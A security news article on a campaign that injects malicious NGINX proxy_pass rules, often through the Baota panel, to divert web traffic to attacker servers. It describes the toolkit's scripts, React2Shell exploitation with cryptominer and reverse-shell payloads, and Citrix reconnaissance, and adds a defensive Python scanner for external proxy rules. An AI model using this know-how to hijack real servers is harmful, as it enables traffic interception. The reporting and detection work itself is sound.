
Cybersecurity researchers have detailed an active web traffic hijacking campaign that targets NGINX installations and administrative panels such as Baota (BT) in an attempt to route them through attackers’ infrastructure.
Datadog Security Labs said it has observed threat actors associated with recent React2Shell (CVE-2025-55182, CVSS score: 10.0) exploits using malicious NGINX configurations to conduct attacks.
“The malicious configuration intercepts legitimate web traffic between users and websites and routes it through backend servers controlled by the attacker,” security researcher Ryan Simon said. “This campaign targets Asian TLDs (.in, .id, .pe, .bd, .th), Chinese hosting infrastructure (Baota panel), and government and education TLDs (.edu, .gov).”
This activity involves using shell scripts to inject malicious configurations into NGINX, an open-source reverse proxy and load balancer for web traffic management. These “location” settings are designed to capture incoming requests at specific predefined URL paths and redirect them to domains under the attacker’s control via the “proxy_pass” directive.

These scripts are part of a multi-stage toolkit that handles target detection, persistence, and the creation of malicious configuration files containing directives that redirect web traffic. The toolkit components are:
- zx.sh acts as an orchestrator that executes the subsequent stages through regular utilities such as curl and wget; if both programs are blocked, it falls back to opening raw TCP connections and sending the HTTP requests itself.
- bt.sh targets the Baota (BT) admin panel environment and overwrites the NGINX configuration file.
- 4zdh.sh enumerates common NGINX configuration locations and takes steps to minimize errors when creating new configurations.
- zdh.sh takes a narrower targeting approach, focusing primarily on Linux or containerized NGINX configurations serving top-level domains (TLDs) such as .in and .id.
- ok.sh generates a report detailing all active NGINX traffic hijacking rules.
“The toolkit contains several scripts designed for target detection and persistence and creation of malicious configuration files containing directives intended to redirect web traffic,” Datadog said.
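As an added defender-side example (not Datadog's code and not part of the toolkit described above), the following Python scans an NGINX configuration for location blocks whose proxy_pass points at a non-local upstream, which is the hijack pattern described in the preceding paragraphs and the kind of active rule that ok.sh is said to report on. The configuration text and the hijack-placeholder.example hostname are constructed for the example.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Constructed sample server block: a benign loopback upstream, a location whose
# proxy_pass sends traffic to an external host (placeholder name), and a unix socket.
SAMPLE_CONF = """
server {
    listen 80;
    server_name example.edu;
    location / {
        proxy_pass http://127.0.0.1:8080;
    }
    location /wp-admin/ {
        proxy_pass http://hijack-placeholder.example:8081;
    }
    location /api/ {
        proxy_pass http://unix:/run/app.sock;
    }
}
"""

# Matches "location [modifier] <path> { ... }" for flat blocks; nested blocks
# (e.g. an inner "if { }") are not descended into.
LOCATION_RE = re.compile(r"location\s+(?:[=~*^]+\s*)?(\S+)\s*\{([^{}]*)\}")
PROXY_RE = re.compile(r"proxy_pass\s+([^;\s]+)\s*;")


def is_local_upstream(target: str) -> bool:
    """True when proxy_pass points at a unix socket, localhost, or a private/loopback IP."""
    if target.startswith("unix:") or "://unix:" in target:
        return True
    host = urlparse(target).hostname or ""
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_private  # covers 127/8, 10/8, 172.16/12, 192.168/16
    except ValueError:
        return False  # a DNS name: treat as external unless you allow-list it


def find_external_proxies(conf: str):
    """Return (location path, proxy_pass target) pairs that hand traffic to non-local hosts."""
    findings = []
    for loc in LOCATION_RE.finditer(conf):
        path, body = loc.group(1), loc.group(2)
        for directive in PROXY_RE.finditer(body):
            target = directive.group(1)
            if not is_local_upstream(target):
                findings.append((path, target))
    return findings


if __name__ == "__main__":
    for path, target in find_external_proxies(SAMPLE_CONF):
        print(f"suspicious location {path} -> {target}")
```

Run it against the real files found by enumerating include paths from nginx.conf (the same locations 4zdh.sh probes) to build an inventory of proxy rules that leave the host.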
The disclosure comes as GreyNoise said two IP addresses – 193.142.147[.]209 and 87.121.84[.]24 – account for 56% of all React2Shell exploitation attempts observed in the two months after its disclosure. Between January 26, 2026 and February 2, 2026, a total of 1,083 unique source IP addresses were involved in React2Shell exploitation.
“The primary sources deploy separate post-exploitation payloads: one retrieves the cryptomining binary from a staging server, and the other opens a reverse shell directly to the scanner IP,” the threat intelligence firm said. “This approach suggests an interest in interactive access rather than automated resource extraction.”
This also follows the discovery of a coordinated reconnaissance campaign targeting Citrix ADC Gateway and NetScaler Gateway infrastructure that used tens of thousands of residential proxies and a single Microsoft Azure IP address (52.139.3[.]76) to find login panels.
“This campaign ran two different modes: a large-scale distributed login panel discovery operation with rotation of residential proxies, and an intensive version disclosure sprint hosted on AWS,” GreyNoise said. “They have complementary purposes of both login panel discovery and version enumeration, which suggests coordinated reconnaissance.”
